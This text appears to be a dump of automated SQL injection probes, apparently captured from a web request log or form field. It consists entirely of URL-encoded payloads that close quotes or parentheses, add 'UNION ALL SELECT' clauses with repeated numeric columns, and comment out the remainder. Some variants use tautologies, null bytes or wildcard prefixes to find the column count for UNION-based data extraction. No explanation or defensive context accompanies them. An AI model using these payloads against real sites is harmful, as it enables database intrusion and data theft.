-6846%25%27%29%29%29%20UNION%20ALL%20SELECT%208789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789%2C8789--%20 -8774%25%27%29%29%29%20UNION%20ALL%20SELECT%205084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084--%20 -2690%25%27%29%29%29%20UNION%20ALL%20SELECT%207276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276%2C7276--%20 -6019%25%27%29%29%29%20UNION%20ALL%20SELECT%205994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994%2C5994--%20 -2558%25%27%29%29%29%20UNION%20ALL%20SELECT%204123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123--%20 -2084%25%27%29%29%29%20UNION%20ALL%20SELECT%207294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294--%20 -1380%25%27%20UNION%20ALL%20SELECT%202672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672--%20 -5156%25%27%20UNION%20ALL%20SELECT%201731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731%2C1731--%20 -4675%25%27%20UNION%20ALL%20SELECT%207762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762%2C7762--%20 -5279%25%27%20UNION%20ALL%20SELECT%206756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756%2C6756--%20 -4065%25%27%20UNION%20ALL%20SELECT%203887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887--%20 -8417%25%27%20UNION%20ALL%20SELECT%204173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173--%20 -8591%25%27%20UNION%20ALL%20SELECT%201991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991--%20 -8503%25%27%20UNION%20ALL%20SELECT%204879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879--%20 -6627%25%27%20UNION%20ALL%20SELECT%204621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621%2C4621--%20 -7743%25%27%20UNION%20ALL%20SELECT%208026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026--%20 -4606%00%27%29%20UNION%20ALL%20SELECT%209909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909%2C9909--%20 -2018%00%27%29%20UNION%20ALL%20SELECT%207095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095--%20 -8187%00%27%29%20UNION%20ALL%20SELECT%208366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366--%20 -7506%00%27%29%20UNION%20ALL%20SELECT%208876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876--%20 -7087%00%27%29%20UNION%20ALL%20SELECT%206220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220--%20 -7107%00%27%29%20UNION%20ALL%20SELECT%206984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984%2C6984--%20 -6195%00%27%29%20UNION%20ALL%20SELECT%204008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008%2C4008--%20 -7955%00%27%29%20UNION%20ALL%20SELECT%203802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802%2C3802--%20 -1587%00%27%29%20UNION%20ALL%20SELECT%207156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156%2C7156--%20 -5214%00%27%29%20UNION%20ALL%20SELECT%207989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989%2C7989--%20 -5402%00%27%20UNION%20ALL%20SELECT%202797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797--%20 -2392%00%27%20UNION%20ALL%20SELECT%204824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824--%20 -9534%00%27%20UNION%20ALL%20SELECT%208478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478--%20 -8391%00%27%20UNION%20ALL%20SELECT%205024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024%2C5024--%20 -6676%00%27%20UNION%20ALL%20SELECT%205623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623%2C5623--%20 -7157%00%27%20UNION%20ALL%20SELECT%204638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638--%20 -9539%00%27%20UNION%20ALL%20SELECT%207180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180--%20 -4131%00%27%20UNION%20ALL%20SELECT%202789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789%2C2789--%20 -6731%00%27%20UNION%20ALL%20SELECT%202246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246%2C2246--%20 -4387%00%27%20UNION%20ALL%20SELECT%203476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476%2C3476--%20 -9720%27%29%20WHERE%209358%3D9358%20UNION%20ALL%20SELECT%209358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358%2C9358--%20 -9990%27%29%20WHERE%206564%3D6564%20UNION%20ALL%20SELECT%206564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564%2C6564--%20 -8953%27%29%20WHERE%204663%3D4663%20UNION%20ALL%20SELECT%204663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663%2C4663--%20 -8931%27%29%20WHERE%205845%3D5845%20UNION%20ALL%20SELECT%205845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845--%20 -8725%27%29%20WHERE%208089%3D8089%20UNION%20ALL%20SELECT%208089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089%2C8089--%20 -9823%27%29%20WHERE%209908%3D9908%20UNION%20ALL%20SELECT%209908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908%2C9908--%20 -6628%27%29%20WHERE%207902%3D7902%20UNION%20ALL%20SELECT%207902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902--%20 -4301%27%29%20WHERE%204501%3D4501%20UNION%20ALL%20SELECT%204501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501%2C4501--%20 -9235%27%29%20WHERE%207625%3D7625%20UNION%20ALL%20SELECT%207625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625%2C7625--%20 -7543%27%29%20WHERE%206241%3D6241%20UNION%20ALL%20SELECT%206241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241--%20 -4860%22%29%20WHERE%209084%3D9084%20UNION%20ALL%20SELECT%209084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084%2C9084--%20 -6436%22%29%20WHERE%204796%3D4796%20UNION%20ALL%20SELECT%204796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796%2C4796--%20 -4204%22%29%20WHERE%204307%3D4307%20UNION%20ALL%20SELECT%204307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307--%20 -8471%22%29%20WHERE%201704%3D1704%20UNION%20ALL%20SELECT%201704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704%2C1704--%20 -7962%22%29%20WHERE%204451%3D4451%20UNION%20ALL%20SELECT%204451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451--%20 -3631%22%29%20WHERE%209816%3D9816%20UNION%20ALL%20SELECT%209816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816%2C9816--%20 -9676%22%29%20WHERE%209708%3D9708%20UNION%20ALL%20SELECT%209708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708--%20 -8085%22%29%20WHERE%205572%3D5572%20UNION%20ALL%20SELECT%205572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572--%20 -3601%22%29%20WHERE%201696%3D1696%20UNION%20ALL%20SELECT%201696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696%2C1696--%20 -5376%22%29%20WHERE%209617%3D9617%20UNION%20ALL%20SELECT%209617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617%2C9617--%20 -9452%29%20WHERE%205149%3D5149%20UNION%20ALL%20SELECT%205149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149%2C5149--%20 -4291%29%20WHERE%209010%3D9010%20UNION%20ALL%20SELECT%209010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010--%20 -4252%29%20WHERE%205923%3D5923%20UNION%20ALL%20SELECT%205923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923--%20 -6365%29%20WHERE%209161%3D9161%20UNION%20ALL%20SELECT%209161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161%2C9161--%20 -9718%29%20WHERE%205150%3D5150%20UNION%20ALL%20SELECT%205150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150%2C5150--%20 -9406%29%20WHERE%202080%3D2080%20UNION%20ALL%20SELECT%202080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080--%20 -6335%29%20WHERE%208966%3D8966%20UNION%20ALL%20SELECT%208966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966--%20 -3946%29%20WHERE%202808%3D2808%20UNION%20ALL%20SELECT%202808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808%2C2808--%20 -8013%29%20WHERE%205343%3D5343%20UNION%20ALL%20SELECT%205343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343%2C5343--%20 -9562%29%20WHERE%209951%3D9951%20UNION%20ALL%20SELECT%209951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951--%20 -1425%27%20WHERE%204889%3D4889%20UNION%20ALL%20SELECT%204889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889--%20 -5436%27%20WHERE%206105%3D6105%20UNION%20ALL%20SELECT%206105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105--%20 -1085%27%20WHERE%205569%3D5569%20UNION%20ALL%20SELECT%205569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569--%20 -8320%27%20WHERE%207936%3D7936%20UNION%20ALL%20SELECT%207936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936%2C7936--%20 -6816%27%20WHERE%204096%3D4096%20UNION%20ALL%20SELECT%204096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096%2C4096--%20 -5256%27%20WHERE%205037%3D5037%20UNION%20ALL%20SELECT%205037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037%2C5037--%20 -1886%27%20WHERE%203574%3D3574%20UNION%20ALL%20SELECT%203574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574--%20 -2522%27%20WHERE%208162%3D8162%20UNION%20ALL%20SELECT%208162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162%2C8162--%20 -8190%27%20WHERE%201760%3D1760%20UNION%20ALL%20SELECT%201760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760%2C1760--%20 -7983%27%20WHERE%202025%3D2025%20UNION%20ALL%20SELECT%202025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025%2C2025--%20 -6648%22%20WHERE%208534%3D8534%20UNION%20ALL%20SELECT%208534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534--%20 -6580%22%20WHERE%206510%3D6510%20UNION%20ALL%20SELECT%206510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510--%20 -1024%22%20WHERE%208050%3D8050%20UNION%20ALL%20SELECT%208050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050%2C8050--%20 -6509%22%20WHERE%201016%3D1016%20UNION%20ALL%20SELECT%201016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016%2C1016--%20 -6745%22%20WHERE%202819%3D2819%20UNION%20ALL%20SELECT%202819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819%2C2819--%20 -1661%22%20WHERE%202895%3D2895%20UNION%20ALL%20SELECT%202895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895--%20 -9827%22%20WHERE%201257%3D1257%20UNION%20ALL%20SELECT%201257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257%2C1257--%20 -5094%22%20WHERE%206583%3D6583%20UNION%20ALL%20SELECT%206583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583%2C6583--%20 -9567%22%20WHERE%209795%3D9795%20UNION%20ALL%20SELECT%209795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795%2C9795--%20 -4715%22%20WHERE%202363%3D2363%20UNION%20ALL%20SELECT%202363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363--%20 -8122%20WHERE%208119%3D8119%20UNION%20ALL%20SELECT%208119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119--%20 -4915%20WHERE%201531%3D1531%20UNION%20ALL%20SELECT%201531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531--%20 -1185%20WHERE%201019%3D1019%20UNION%20ALL%20SELECT%201019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019%2C1019--%20 -2395%20WHERE%204659%3D4659%20UNION%20ALL%20SELECT%204659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659%2C4659--%20 -6485%20WHERE%204175%3D4175%20UNION%20ALL%20SELECT%204175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175%2C4175--%20 -8902%20WHERE%209374%3D9374%20UNION%20ALL%20SELECT%209374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374%2C9374--%20 -9741%20WHERE%205500%3D5500%20UNION%20ALL%20SELECT%205500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500--%20 